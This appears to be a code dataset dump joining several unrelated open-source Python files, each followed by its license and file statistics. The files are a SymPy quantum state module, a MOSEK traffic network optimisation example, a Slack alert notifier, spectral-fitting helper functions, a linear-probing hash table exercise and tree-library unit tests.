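    #         def _eval_innerproduct_XBra(self, bra, **hints):
    #             return Integer(1)  # declares <XBra|XKet> == 1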
def _apply_operator(self, op, **options):
"""Apply an Operator to this Ket.
This method will dispatch to methods having the format::
        ``def _apply_operator_OperatorName(self, op, **options):``
Subclasses should define these methods (one for each OperatorName) to
teach the Ket how operators act on it.
Parameters
==========
op : Operator
The Operator that is acting on the Ket.
options : dict
A dict of key/value pairs that control how the operator is applied
to the Ket.
"""
return dispatch_method(self, '_apply_operator', op, **options)
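    # Likewise, a hypothetical sketch of operator dispatch (``XOp`` is an
    # assumed operator name, for illustration only):
    #
    #     class XKet(KetBase):
    #         def _apply_operator_XOp(self, op, **options):
    #             return self  # declares XOp acting trivially on |XKet>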
class BraBase(StateBase):
"""Base class for Bras.
This class defines the dual property and the brackets for printing. This
is an abstract base class and you should not instantiate it directly,
instead use Bra.
"""
lbracket = _lbracket
rbracket = _straight_bracket
lbracket_ucode = _lbracket_ucode
rbracket_ucode = _straight_bracket_ucode
lbracket_latex = r'\left\langle '
rbracket_latex = r'\right|'
@classmethod
def _operators_to_state(self, ops, **options):
state = self.dual_class().operators_to_state(ops, **options)
return state.dual
def _state_to_operators(self, op_classes, **options):
return self.dual._state_to_operators(op_classes, **options)
def _enumerate_state(self, num_states, **options):
dual_states = self.dual._enumerate_state(num_states, **options)
return map(lambda x: x.dual, dual_states)
@classmethod
def default_args(self):
return self.dual_class().default_args()
@classmethod
def dual_class(self):
return KetBase
def __mul__(self, other):
"""BraBase*other"""
from sympy.physics.quantum.innerproduct import InnerProduct
if isinstance(other, KetBase):
return InnerProduct(self, other)
else:
return Expr.__mul__(self, other)
def __rmul__(self, other):
"""other*BraBase"""
from sympy.physics.quantum.operator import OuterProduct
if isinstance(other, KetBase):
return OuterProduct(other, self)
else:
return Expr.__rmul__(self, other)
def _represent(self, **options):
"""A default represent that uses the Ket's version."""
from sympy.physics.quantum.dagger import Dagger
return Dagger(self.dual._represent(**options))
class State(StateBase):
"""General abstract quantum state used as a base class for Ket and Bra."""
pass
class Ket(State, KetBase):
"""A general time-independent Ket in quantum mechanics.
Inherits from State and KetBase. This class should be used as the base
class for all physical, time-independent Kets in a system. This class
and its subclasses will be the main classes that users will use for
expressing Kets in Dirac notation [1]_.
Parameters
==========
args : tuple
The list of numbers or parameters that uniquely specify the
ket. This will usually be its symbol or its quantum numbers. For
time-dependent state, this will include the time.
Examples
========
Create a simple Ket and looking at its properties::
>>> from sympy.physics.quantum import Ket, Bra
>>> from sympy import symbols, I
>>> k = Ket('psi')
>>> k
|psi>
>>> k.hilbert_space
H
>>> k.is_commutative
False
>>> k.label
(psi,)
    Kets know about their associated bra::
>>> k.dual
<psi|
>>> k.dual_class()
<class 'sympy.physics.quantum.state.Bra'>
Take a linear combination of two kets::
>>> k0 = Ket(0)
>>> k1 = Ket(1)
>>> 2*I*k0 - 4*k1
2*I*|0> - 4*|1>
Compound labels are passed as tuples::
>>> n, m = symbols('n,m')
>>> k = Ket(n,m)
>>> k
|nm>
References
==========
.. [1] http://en.wikipedia.org/wiki/Bra-ket_notation
"""
@classmethod
def dual_class(self):
return Bra
class Bra(State, BraBase):
"""A general time-independent Bra in quantum mechanics.
Inherits from State and BraBase. A Bra is the dual of a Ket [1]_. This
class and its subclasses will be the main classes that users will use for
expressing Bras in Dirac notation.
Parameters
==========
args : tuple
The list of numbers or parameters that uniquely specify the
ket. This will usually be its symbol or its quantum numbers. For
time-dependent state, this will include the time.
Examples
========
Create a simple Bra and look at its properties::
>>> from sympy.physics.quantum import Ket, Bra
>>> from sympy import symbols, I
>>> b = Bra('psi')
>>> b
<psi|
>>> b.hilbert_space
H
>>> b.is_commutative
False
    Bras know about their dual Kets::
>>> b.dual
|psi>
>>> b.dual_class()
<class 'sympy.physics.quantum.state.Ket'>
Like Kets, Bras can have compound labels and be manipulated in a similar
manner::
>>> n, m = symbols('n,m')
>>> b = Bra(n,m) - I*Bra(m,n)
>>> b
-I*<mn| + <nm|
Symbols in a Bra can be substituted using ``.subs``::
>>> b.subs(n,m)
<mm| - I*<mm|
References
==========
.. [1] http://en.wikipedia.org/wiki/Bra-ket_notation
"""
@classmethod
def dual_class(self):
return Ket
#-----------------------------------------------------------------------------
# Time dependent states, bras and kets.
#-----------------------------------------------------------------------------
class TimeDepState(StateBase):
"""Base class for a general time-dependent quantum state.
This class is used as a base class for any time-dependent state. The main
difference between this class and the time-independent state is that this
class takes a second argument that is the time in addition to the usual
label argument.
Parameters
==========
args : tuple
The list of numbers or parameters that uniquely specify the ket. This
will usually be its symbol or its quantum numbers. For time-dependent
state, this will include the time as the final argument.
"""
#-------------------------------------------------------------------------
# Initialization
#-------------------------------------------------------------------------
@classmethod
def default_args(self):
return ("psi", "t")
#-------------------------------------------------------------------------
# Properties
#-------------------------------------------------------------------------
@property
def label(self):
"""The label of the state."""
return self.args[:-1]
@property
def time(self):
"""The time of the state."""
return self.args[-1]
#-------------------------------------------------------------------------
# Printing
#-------------------------------------------------------------------------
def _print_time(self, printer, *args):
return printer._print(self.time, *args)
_print_time_repr = _print_time
_print_time_latex = _print_time
def _print_time_pretty(self, printer, *args):
pform = printer._print(self.time, *args)
return pform
def _print_contents(self, printer, *args):
label = self._print_label(printer, *args)
time = self._print_time(printer, *args)
return '%s;%s' % (label, time)
def _print_label_repr(self, printer, *args):
label = self._print_sequence(self.label, ',', printer, *args)
time = self._print_time_repr(printer, *args)
return '%s,%s' % (label, time)
def _print_contents_pretty(self, printer, *args):
label = self._print_label_pretty(printer, *args)
time = self._print_time_pretty(printer, *args)
return printer._print_seq((label, time), delimiter=';')
def _print_contents_latex(self, printer, *args):
label = self._print_sequence(
self.label, self._label_separator, printer, *args)
time = self._print_time_latex(printer, *args)
return '%s;%s' % (label, time)
class TimeDepKet(TimeDepState, KetBase):
"""General time-dependent Ket in quantum mechanics.
This inherits from ``TimeDepState`` and ``KetBase`` and is the main class
that should be used for Kets that vary with time. Its dual is a
``TimeDepBra``.
Parameters
==========
args : tuple
The list of numbers or parameters that uniquely specify the ket. This
will usually be its symbol or its quantum numbers. For time-dependent
state, this will include the time as the final argument.
Examples
========
Create a TimeDepKet and look at its attributes::
>>> from sympy.physics.quantum import TimeDepKet
>>> k = TimeDepKet('psi', 't')
>>> k
|psi;t>
>>> k.time
t
>>> k.label
(psi,)
>>> k.hilbert_space
H
TimeDepKets know about their dual bra::
>>> k.dual
<psi;t|
>>> k.dual_class()
<class 'sympy.physics.quantum.state.TimeDepBra'>
"""
@classmethod
def dual_class(self):
return TimeDepBra
class TimeDepBra(TimeDepState, BraBase):
"""General time-dependent Bra in quantum mechanics.
This inherits from TimeDepState and BraBase and is the main class that
    should be used for Bras that vary with time. Its dual is a TimeDepKet.
Parameters
==========
args : tuple
The list of numbers or parameters that uniquely specify the ket. This
will usually be its symbol or its quantum numbers. For time-dependent
state, this will include the time as the final argument.
Examples
========
>>> from sympy.physics.quantum import TimeDepBra
>>> from sympy import symbols, I
>>> b = TimeDepBra('psi', 't')
>>> b
<psi;t|
>>> b.time
t
>>> b.label
(psi,)
>>> b.hilbert_space
H
>>> b.dual
|psi;t>
"""
@classmethod
def dual_class(self):
return TimeDepKet
class Wavefunction(Function):
"""Class for representations in continuous bases
This class takes an expression and coordinates in its constructor. It can
be used to easily calculate normalizations and probabilities.
Parameters
==========
expr : Expr
The expression representing the functional form of the w.f.
coords : Symbol or tuple
The coordinates to be integrated over, and their bounds
Examples
========
Particle in a box, specifying bounds in the more primitive way of using
Piecewise:
>>> from sympy import Symbol, Piecewise, pi, N
>>> from sympy.functions import sqrt, sin
>>> from sympy.physics.quantum.state import Wavefunction
>>> x = Symbol('x', real=True)
>>> n = 1
>>> L = 1
>>> g = Piecewise((0, x < 0), (0, x > L), (sqrt(2//L)*sin(n*pi*x/L), True))
>>> f = Wavefunction(g, x)
>>> f.norm
1
>>> f.is_normalized
True
>>> p = f.prob()
>>> p(0)
0
>>> p(L)
0
>>> p(0.5)
2
>>> p(0.85*L)
2*sin(0.85*pi)**2
>>> N(p(0.85*L))
0.412214747707527
Additionally, you can specify the bounds of the function and the indices in
a more compact way:
>>> from sympy import symbols, pi, diff
>>> from sympy.functions import sqrt, sin
>>> from sympy.physics.quantum.state import Wavefunction
>>> x, L = symbols('x,L', positive=True)
>>> n = symbols('n', integer=True)
>>> g = sqrt(2/L)*sin(n*pi*x/L)
>>> f = Wavefunction(g, (x, 0, L))
>>> f.norm
1
>>> f(L+1)
0
>>> f(L-1)
sqrt(2)*sin(pi*n*(L - 1)/L)/sqrt(L)
>>> f(-1)
0
>>> f(0.85)
sqrt(2)*sin(0.85*pi*n/L)/sqrt(L)
>>> f(0.85, n=1, L=1)
sqrt(2)*sin(0.85*pi)
>>> f.is_commutative
False
All arguments are automatically sympified, so you can define the variables
as strings rather than symbols:
>>> expr = x**2
>>> f = Wavefunction(expr, 'x')
>>> type(f.variables[0])
<class 'sympy.core.symbol.Symbol'>
Derivatives of Wavefunctions will return Wavefunctions:
>>> diff(f, x)
Wavefunction(2*x, x)
"""
#Any passed tuples for coordinates and their bounds need to be
#converted to Tuples before Function's constructor is called, to
#avoid errors from calling is_Float in the constructor
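    #For example, Wavefunction(x**2, (x, 0, 1)) stores the bound coordinate
    #as Tuple(x, 0, 1) rather than as a plain Python tuple.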
def __new__(cls, *args, **options):
new_args = [None for i in args]
ct = 0
for arg in args:
if isinstance(arg, tuple):
new_args[ct] = Tuple(*arg)
else:
new_args[ct] = arg
ct += 1
return super(Function, cls).__new__(cls, *new_args, **options)
def __call__(self, *args, **options):
var = self.variables
if len(args) != len(var):
raise NotImplementedError(
"Incorrect number of arguments to function!")
        #If the passed value is outside the specified bounds, return 0.
        #enumerate keeps args and variables aligned even when an iteration
        #is skipped by the continue below.
        for ct, v in enumerate(var):
            lower, upper = self.limits[v]
            #Do the comparison to limits only if the passed symbol is actually
            #a symbol present in the limits;
            #Had problems with a comparison of x > L
            if isinstance(args[ct], Expr) and \
                not (lower in args[ct].free_symbols
                    or upper in args[ct].free_symbols):
                continue
            if args[ct] < lower or args[ct] > upper:
                return 0
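        #For example, with f = Wavefunction(x**2, (x, 0, 1)) the call f(2)
        #returns 0 here, since 2 lies outside the declared bounds (0, 1).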
expr = self.expr
#Allows user to make a call like f(2, 4, m=1, n=1)
for symbol in list(expr.free_symbols):
if str(symbol) in options.keys():
val = options[str(symbol)]
expr = expr.subs(symbol, val)
return expr.subs(zip(var, args))
def _eval_derivative(self, symbol):
expr = self.expr
deriv = expr._eval_derivative(symbol)
return Wavefunction(deriv, *self.args[1:])
def _eval_conjugate(self):
return Wavefunction(conjugate(self.expr), *self.args[1:])
def _eval_transpose(self):
return self
@property
def free_symbols(self):
return self.expr.free_symbols
@property
def is_commutative(self):
"""
Override Function's is_commutative so that order is preserved in
represented expressions
"""
return False
@classmethod
def eval(self, *args):
return None
@property
def variables(self):
"""
Return the coordinates which the wavefunction depends on
Examples
========
>>> from sympy.physics.quantum.state import Wavefunction
>>> from sympy import symbols
>>> x,y = symbols('x,y')
>>> f = Wavefunction(x*y, x, y)
>>> f.variables
(x, y)
>>> g = Wavefunction(x*y, x)
>>> g.variables
(x,)
"""
var = [g[0] if isinstance(g, Tuple) else g for g in self._args[1:]]
return tuple(var)
@property
def limits(self):
"""
        Return the limits of the coordinates which the w.f. depends on. If no
        limits are specified, defaults to ``(-oo, oo)``.
Examples
========
>>> from sympy.physics.quantum.state import Wavefunction
>>> from sympy import symbols
>>> x, y = symbols('x, y')
>>> f = Wavefunction(x**2, (x, 0, 1))
>>> f.limits
{x: (0, 1)}
>>> f = Wavefunction(x**2, x)
>>> f.limits
{x: (-oo, oo)}
>>> f = Wavefunction(x**2 + y**2, x, (y, -1, 2))
>>> f.limits
{x: (-oo, oo), y: (-1, 2)}
"""
limits = [(g[1], g[2]) if isinstance(g, Tuple) else (-oo, oo)
for g in self._args[1:]]
return dict(zip(self.variables, tuple(limits)))
@property
def expr(self):
"""
Return the expression which is the functional form of the Wavefunction
Examples
========
>>> from sympy.physics.quantum.state import Wavefunction
>>> from sympy import symbols
>>> x, y = symbols('x, y')
>>> f = Wavefunction(x**2, x)
>>> f.expr
x**2
"""
return self._args[0]
@property
def is_normalized(self):
"""
Returns true if the Wavefunction is properly normalized
Examples
========
>>> from sympy import symbols, pi
>>> from sympy.functions import sqrt, sin
>>> from sympy.physics.quantum.state import Wavefunction
>>> x, L = symbols('x,L', positive=True)
>>> n = symbols('n', integer=True)
>>> g = sqrt(2/L)*sin(n*pi*x/L)
>>> f = Wavefunction(g, (x, 0, L))
>>> f.is_normalized
True
"""
return (self.norm == 1.0)
@property
@cacheit
def norm(self):
"""
Return the normalization of the specified functional form.
This function integrates over the coordinates of the Wavefunction, with
the bounds specified.
Examples
========
>>> from sympy import symbols, pi
>>> from sympy.functions import sqrt, sin
>>> from sympy.physics.quantum.state import Wavefunction
>>> x, L = symbols('x,L', positive=True)
>>> n = symbols('n', integer=True)
>>> g = sqrt(2/L)*sin(n*pi*x/L)
>>> f = Wavefunction(g, (x, 0, L))
>>> f.norm
1
>>> g = sin(n*pi*x/L)
>>> f = Wavefunction(g, (x, 0, L))
>>> f.norm
sqrt(2)*sqrt(L)/2
"""
exp = self.expr*conjugate(self.expr)
var = self.variables
limits = self.limits
for v in var:
curr_limits = limits[v]
exp = integrate(exp, (v, curr_limits[0], curr_limits[1]))
return sqrt(exp)
def normalize(self):
"""
Return a normalized version of the Wavefunction
Examples
========
>>> from sympy import symbols, pi
>>> from sympy.functions import sqrt, sin
>>> from sympy.physics.quantum.state import Wavefunction
>>> x, L = symbols('x,L', real=True)
>>> n = symbols('n', integer=True)
>>> g = sin(n*pi*x/L)
>>> f = Wavefunction(g, (x, 0, L))
>>> f.normalize()
Wavefunction(sqrt(2)*sin(pi*n*x/L)/sqrt(L), (x, 0, L))
"""
const = self.norm
if const == oo:
raise NotImplementedError("The function is not normalizable!")
else:
return Wavefunction((const)**(-1)*self.expr, *self.args[1:])
def prob(self):
"""
Return the absolute magnitude of the w.f., `|\psi(x)|^2`
Examples
========
>>> from sympy import symbols, pi
>>> from sympy.functions import sqrt, sin
>>> from sympy.physics.quantum.state import Wavefunction
>>> x, L = symbols('x,L', real=True)
>>> n = symbols('n', integer=True)
>>> g = sin(n*pi*x/L)
>>> f = Wavefunction(g, (x, 0, L))
>>> f.prob()
Wavefunction(sin(pi*n*x/L)**2, x)
"""
return Wavefunction(self.expr*conjugate(self.expr), *self.variables)
|
bsd-3-clause
| 1,310,228,906,220,686,800
| 29.209474
| 106
| 0.545245
| false
| 4.150853
| false
| false
| false
|
edljk/Mosek.jl
|
deps/src/mosek/7/tools/examples/fusion/python/TrafficNetworkModel.py
|
1
|
4935
|
#
# Copyright: Copyright (c) MOSEK ApS, Denmark. All rights reserved.
#
# File: TrafficNetworkModel.py
#
# Purpose: Demonstrates a traffic network problem as a conic quadratic problem.
#
# Source: Robert Fourer, "Convexity Checking in Large-Scale Optimization",
# OR 53 --- Nottingham 6-8 September 2011.
#
# The problem:
# Given a directed graph representing a traffic network
# with one source and one sink, we have for each arc an
# associated capacity, base travel time and a
# sensitivity. Travel time along a specific arc increases
# as the flow approaches the capacity.
#
# Given a fixed inflow we now wish to find the
# configuration that minimizes the average travel time.
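#
# A sketch of how the code below encodes this (our annotation, not part
# of the original example): for each arc (i,j) with flow x_ij, capacity
# c_ij and sensitivity s_ij, constraint (1b) fixes
#     z_ij = (c_ij - x_ij) / (s_ij * c_ij)
# and constraint (1a) puts each triple (d_ij, z_ij, x_ij) into a rotated
# quadratic cone (2*d*z >= x^2 in MOSEK's convention), so d_ij bounds the
# congestion-dependent part of the travel time that appears in the
# objective. Constraint (2) is flow conservation at every node, and
# constraint (3) pins the flow on the artificial sink->source arc to T.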
from mosek.fusion import *
import sys
class TrafficNetworkError(Exception): pass
class TrafficNetworkModel(Model):
def __init__(self,
numberOfNodes,
source_idx,
sink_idx,
arc_i,
arc_j,
arcSensitivity,
arcCapacity,
arcBaseTravelTime,
T):
Model.__init__(self,"Traffic Network")
finished = False
try:
n = numberOfNodes
narcs = len(arc_i)
NxN = NDSet(n, n)
sens = Matrix.sparse(n, n, arc_i, arc_j, arcSensitivity)
cap = Matrix.sparse(n, n, arc_i, arc_j, arcCapacity)
basetime = Matrix.sparse(n, n, arc_i, arc_j, arcBaseTravelTime)
e = Matrix.sparse(n, n, arc_i, arc_j, [ 1.0 ] * narcs)
            e_e = Matrix.sparse(n,n, [ sink_idx ],[ source_idx ], [ 1.0 ])
cs_inv_matrix = \
Matrix.sparse(n, n, arc_i, arc_j,
[ 1.0 / (arcSensitivity[i] * arcCapacity[i]) for i in range(narcs)])
s_inv_matrix = \
Matrix.sparse(n, n, arc_i, arc_j,
[ 1.0 / arcSensitivity[i] for i in range(narcs)])
self.__flow = self.variable("traffic_flow", NxN, Domain.greaterThan(0.0))
            x = self.__flow
t = self.variable("travel_time" , NxN, Domain.greaterThan(0.0))
d = self.variable("d", NxN, Domain.greaterThan(0.0))
z = self.variable("z", NxN, Domain.greaterThan(0.0))
# Set the objective:
self.objective("Average travel time",
ObjectiveSense.Minimize,
Expr.mul(1.0/T, Expr.add(Expr.dot(basetime,x), Expr.dot(e,d))))
# Set up constraints
# Constraint (1a)
numnz = len(arcSensitivity)
v = Variable.stack([ [ d.index(arc_i[i],arc_j[i]),
z.index(arc_i[i],arc_j[i]),
x.index(arc_i[i],arc_j[i]) ] for i in range(narcs) ])
self.constraint("(1a)",v, Domain.inRotatedQCone(narcs,3))
# Constraint (1b)
self.constraint("(1b)",
Expr.sub(Expr.add(Expr.mulElm(z,e),
Expr.mulElm(x,cs_inv_matrix)),
s_inv_matrix),
Domain.equalsTo(0.0))
# Constraint (2)
self.constraint("(2)",
Expr.sub(Expr.add(Expr.mulDiag(x, e.transpose()),
Expr.mulDiag(x, e_e.transpose())),
Expr.add(Expr.mulDiag(x.transpose(), e),
Expr.mulDiag(x.transpose(), e_e))),
Domain.equalsTo(0.0))
# Constraint (3)
self.constraint("(3)",x.index(sink_idx, source_idx), Domain.equalsTo(T))
finished = True
finally:
if not finished:
self.__del__()
    # Return the solution. We do this the easy and inefficient way:
    # We fetch the whole NxN array of values, a lot of which are
    # zeros.
def getFlow(self):
return self.__flow.level()
def main(args):
n = 4
arc_i = [ 0, 0, 2, 1, 2 ]
arc_j = [ 1, 2, 1, 3, 3 ]
arc_base = [ 4.0, 1.0, 2.0, 1.0, 6.0 ]
arc_cap = [ 10.0, 12.0, 20.0, 15.0, 10.0 ]
arc_sens = [ 0.1, 0.7, 0.9, 0.5, 0.1 ]
T = 20.0
source_idx = 0
sink_idx = 3
with TrafficNetworkModel(n, source_idx, sink_idx,
arc_i, arc_j,
arc_sens,
arc_cap,
arc_base,
T) as M:
M.solve()
flow = M.getFlow()
print("Optimal flow:")
for i,j in zip(arc_i,arc_j):
print "\tflow node%d->node%d = %f" % (i,j, flow[i * n + j])
main(sys.argv[1:])
|
mit
| 7,939,681,877,127,627,000
| 35.286765
| 94
| 0.473759
| false
| 3.537634
| false
| false
| false
|
eahrold/SysOps
|
observy/notifications/SlackNotification.py
|
1
|
1532
|
#!/usr/bin/env python
import subprocess
import json
import urllib2
from notifications import HookableNotifications
class SlackNotification(HookableNotifications):
"""Slack Notification class"""
_webhook_service_name = 'slack'
def __init__(self, errors):
super(SlackNotification, self).__init__(errors)
def send(self):
print "Sening slack notifications"
for error in self.errors:
message = error['message']
status_code = error['status_code']
            icon_emoji = ":fire_engine:" if status_code == 3 else ":fire:"
            username = "server-notice" if status_code == 3 else "server-alert"
host_info = self.host_info()
full_message = "Alert from %s: %s at %s" % (host_info['host'],
message,
self.timestamp()
)
payload={
"text": full_message,
"icon_emoji": icon_emoji,
"username": username,
}
for webhook in self.webhooks():
try:
req = urllib2.Request(webhook)
req.add_header('Content-Type', 'application/json')
response = urllib2.urlopen(req, json.dumps(payload))
except Exception as e:
pass
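# Hypothetical usage sketch (assumes the HookableNotifications base class
# supplies the webhooks(), host_info() and timestamp() helpers used above):
#
#   errors = [{'message': 'disk nearly full', 'status_code': 2}]
#   SlackNotification(errors).send()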
|
mit
| 8,007,633,411,876,338,000
| 31.595745
| 78
| 0.490862
| false
| 4.990228
| false
| false
| false
|
Delosari/dazer
|
bin/lib/ssp_functions/ssp_Hector_Fit3D_my.py
|
1
|
2446
|
#!/usr/bin/python
import sys
import numpy as np
from numpy import float_
from numpy import absolute as abs
from numpy import random as ran
import matplotlib
from scipy.signal.signaltools import convolve2d
from scipy.interpolate.interpolate import interp1d
def A_l(Rv,l):
l=l/10000.; #Amstrongs to Microns
x=1/l
if x > 1.1:
y=(x-1.82)
ax=1+0.17699*y-0.50447*y**2-0.02427*y**3+0.72085*y**4+0.01979*y**5-0.77530*y**6+0.32999*y**7
bx=1.41338*y+2.28305*y**2+1.07233*y**3-5.38434*y**4-0.62251*y**5+5.30260*y**6-2.09002*y**7
else:
ax=0.574*x**1.61
bx=-0.527*x**1.61
Arat=ax+bx/Rv
return Arat
def median_filter(box,arra):
if box == 2*int(box/2.):
box=box+1
    val=np.copy(arra)  # work on a copy so later windows read the original values
# print val.shape,box
for i in range(box, (len(val)+1-box)):
tmp=np.zeros(2*box)
for jk in range(0, 2*box):
tmp[jk]=arra[i-box+jk]
val[i]=np.median(tmp)
for i in range(1, box):
effec_box=i
tmp=np.zeros(2*effec_box)
for jk in range(0, 2*effec_box):
tmp[jk]=arra[i-effec_box+jk]
val[i]=np.median(tmp)
for i in range(len(val)+1-box, len(val)):
effec_box=len(val)-i+1
tmp=np.zeros(2*effec_box)
for jk in range(0, 2*effec_box):
tmp[jk]=arra[i-effec_box+jk-1]
val[i]=np.median(tmp)
val[0]=val[1]
return val
def median_box(box, arra):
if box == 2*int(box/2.):
box=box+1
in_val=arra
out_val=[]
k=0
for i in range(box, len(in_val)+1-box, 2*box):
tmp=np.zeros(2*box)
for j in range(0, 2*box):
tmp[j]=arra[i-box+j]
out_val.extend([np.median(tmp)])
out_val=np.array(out_val)
return out_val
def sycall(comand):
from subprocess import call
line=comand.split(" ")
fcomand=[]
fcomand.extend(line)
call(fcomand)
def stats(data):
out=np.zeros(7)
out[0]=np.mean(data)
out[1]=np.mean(data)+np.std(data)
out[2]=np.median(data)
out[3]=np.amin(data)
out[4]=np.amax(data)
out[5]=np.std(data)
out[6]=np.mean(data)+np.std(data)
return out
def mycall(comand, alias_py='python'):
from subprocess import call
line=comand.split(" ")
    fcomand=[alias_py]  # e.g. 'python' or 'python2.7'
fcomand.extend(line)
linp=''
nx=len(fcomand)
for i in range(1, nx):
linp=linp+fcomand[i]+" "
print linp
call(fcomand)
print "DONE"
|
mit
| 1,560,906,364,386,569,200
| 25.311828
| 100
| 0.572772
| false
| 2.521649
| false
| false
| false
|
KarlParkinson/practice
|
dataStructures/hashTable.py
|
1
|
2520
|
class HashTable:
def __init__(self, size):
self.size = size
self.keys = [None]*size
self.data = [None]*size
def put(self, key, data):
hashValue = self._hash(key)
if (self.keys[hashValue] == None):
# no collision, found empty slot, so insert
self.keys[hashValue] = key
self.data[hashValue] = data
elif (self.keys[hashValue] == key):
# no collision, found spot, replace old data
self.data[hashValue] = data
else:
hashValue = self._rehash(hashValue)
while (self.keys[hashValue] != None and self.keys[hashValue] != key and self.keys[hashValue] != 'deleted'):
hashValue = self._rehash(hashValue)
if (self.keys[hashValue] == None or self.keys[hashValue] == 'deleted'):
# found empty slot, insert data
self.keys[hashValue] = key
self.data[hashValue] = data
else:
# found slot, replace data
self.data[hashValue] = data
def get(self, key):
hashValue = self._hash(key)
found = False
stop = False
startPos = hashValue
while (self.keys[hashValue] != None and not found and not stop):
if (self.keys[hashValue] == key):
found = True
else:
hashValue = self._rehash(hashValue)
if (hashValue == startPos):
stop = True
if (found):
return self.data[hashValue]
else:
return None
def delete(self, key):
hashValue = self._hash(key)
found = False
stop = False
startPos = hashValue
while (self.keys[hashValue] != None and not found and not stop):
if (self.keys[hashValue] == key):
found = True
else:
hashValue = self._rehash(hashValue)
if (hashValue == startPos):
stop = True
if (found):
self.keys[hashValue] = 'deleted'
self.data[hashValue] = None
else:
return False
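    # Collisions are resolved by open addressing with linear probing:
    # _hash maps a key to its home slot, and _rehash steps one slot at a
    # time (wrapping around) until a free or matching slot is found.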
def _hash(self, key):
return key % self.size
def _rehash(self, hashValue):
return (hashValue+1) % self.size
h = HashTable(11)
h.put(1,3)
h.put(12,5)
h.put(23, 78)
print h.keys
h.delete(12)
print h.get(1)
print h.get(23)
print h.keys
h.put(34, 35)
print h.keys
print h.data
#h.put(5,6)
#h.put(7,9)
|
mit
| 2,377,790,933,382,312,000
| 27.965517
| 119
| 0.518651
| false
| 3.806647
| false
| false
| false
|
mbodenhamer/syn
|
syn/tree/b/tests/test_tree.py
|
1
|
8401
|
from operator import attrgetter
from nose.tools import assert_raises
from syn.tree.b import Tree, Node, TreeError, do_nothing, identity
from syn.base.b import check_idempotence, Attr
from syn.base_utils import get_typename
from syn.tree.b.tests.test_node import Tst2, tree_node_from_nested_list,\
tree_node_from_nested_list_types
#-------------------------------------------------------------------------------
# Tree
#-----------------------------------------------------------
# Tree Test 1
def tree_tst_1(treecls):
cls = treecls._attrs.types['root'].type
clsname = get_typename(cls)
n1 = cls(_name='n1', _id=0)
n2 = cls(_name='n2', _id=1)
n3 = cls(_name='n3', _id=2)
n4 = cls(_name='n4', _id=3)
n5 = cls(_name='n5', _id=4)
n6 = cls(_name='n6', _id=5)
n1.add_child(n2)
n1.add_child(n3)
assert list(n1.siblings()) == []
assert list(n2.siblings()) == [n3]
assert list(n3.siblings()) == [n2]
obj = treecls(n1)
check_idempotence(obj)
assert obj.nodes == [n1, n2, n3]
assert obj.node_types == [clsname]
assert obj.id_dict == {0: n1, 1: n2, 2: n3}
assert obj.type_dict == {clsname: [n1, n2, n3]}
assert_raises(TreeError, obj.add_node, n3)
assert_raises(TreeError, obj.add_node, n4, parent=n5)
obj.add_node(n4, parent=n3)
assert n4 in obj.nodes
assert n4 in n3._children
assert n4._parent is n3
assert_raises(TreeError, obj.add_node, n5, parent_id=100)
obj.add_node(n5, parent_id=1)
assert n5 in obj.nodes
assert n5 in n2._children
assert n5._parent is n2
obj.add_node(n6)
assert n6 in obj.nodes
assert n6 in n5._children
assert n6._parent is n5
assert obj.nodes == [n1, n2, n3, n4, n5, n6]
assert obj.node_types == [clsname]
assert obj.id_dict == {0: n1, 1: n2, 2: n3, 3:n4, 4:n5, 5:n6}
assert obj.type_dict == {clsname: [n1, n2, n3, n4, n5, n6]}
for _id,node in enumerate([n1, n2, n3, n4, n5, n6]):
assert obj.get_node_by_id(_id) == obj._get_node_by_id(_id)
assert obj.get_node_by_id(_id) == node
assert obj.get_node_by_id(100) is None
assert obj.get_node_by_id(-1) is None
assert_raises(TypeError, obj.depth_first, FooType = do_nothing)
assert_raises(TypeError, obj._check_search_kwarg_types,
{Tst2: do_nothing})
assert_raises(TypeError, obj._check_search_kwarg_types, {0: do_nothing})
assert list(n1.descendants()) == [n2, n5, n6, n3, n4]
accum = []
def collect(node):
accum.append(node._id)
obj.depth_first(collect)
assert accum == [0, 1, 4, 5, 2, 3]
accum = []
obj.depth_first(**{clsname: collect})
assert accum == [0, 1, 4, 5, 2, 3]
accum = []
obj.search_rootward(collect)
assert accum == [0]
accum = []
obj.search_rootward(**{'current_node': n5,
clsname: collect})
assert accum == [4, 1, 0]
def stop(node):
return node._id == 3
def get(node):
return node._name
assert obj.depth_first(stop_test = stop, _return = get) == 'n4'
assert obj.search_rootward(stop_test = stop, _return = get) is None
assert obj.search_rootward(current_node = n4, stop_test = stop,
_return = get) == 'n4'
assert obj.search_rootward(current_node = n6, stop_test = stop,
_return = get) is None
n7 = cls(_name='n7', _id=6)
n8 = cls(_name='n8', _id=7)
n7.add_child(n8)
obj.replace_node(n5, n7)
assert n2._children == [n7]
assert n7._parent is n2
assert n7._children == [n8]
assert n8._parent is n7
assert n5._children == [n6]
assert n6._parent is n5
assert n5._parent is None
assert obj.nodes == [n1, n2, n3, n4, n7, n8]
assert obj.node_types == [clsname]
assert obj.id_dict == {0: n1, 1: n2, 2: n3, 3:n4, 6:n7, 7:n8}
assert obj.type_dict == {clsname: [n1, n2, n3, n4, n7, n8]}
assert_raises(TreeError, obj.remove_node, n5)
assert_raises(TreeError, obj.replace_node, n5, n7)
obj.remove_node(n2)
assert n1._children == [n3]
assert n2._parent is None
assert n2._children == [n7]
assert n7._parent is n2
assert obj.nodes == [n1, n3, n4]
assert obj.node_types == [clsname]
assert obj.id_dict == {0: n1, 2: n3, 3:n4}
assert obj.type_dict == {clsname: [n1, n3, n4]}
assert_raises(TreeError, obj.replace_node, n1, n7)
assert_raises(TreeError, obj.replace_node, n3, n7)
obj.replace_node(n1, n2)
assert n1._children == [n3]
assert n3._parent is n1
assert obj.root is n2
assert obj.nodes == [n2, n7, n8]
assert obj.node_types == [clsname]
assert obj.id_dict == {1: n2, 6: n7, 7:n8}
assert obj.type_dict == {clsname: [n2, n7, n8]}
obj.rebuild()
assert obj.root is n2
assert obj.nodes == [n2, n7, n8]
assert obj.node_types == [clsname]
assert obj.id_dict == {1: n2, 6: n7, 7:n8}
assert obj.type_dict == {clsname: [n2, n7, n8]}
obj.remove_node(n2)
assert obj.root is None
assert obj.nodes == []
assert obj.node_types == []
assert obj.id_dict == {}
assert obj.type_dict == {}
#-----------------------------------------------------------
# Tree Test 2
def tree_tst_2(treecls):
from syn.base_utils import seq_list_nested
b = 3
d = 4 # 121 nodes
# d = 6 # 1093 nodes
# d = 7 # 3280 nodes
# d = 8 # Almost 10,000 nodes
lst, N = seq_list_nested(b, d, top_level=False)
root = tree_node_from_nested_list(lst[0], lst[1])
assert isinstance(root, Node)
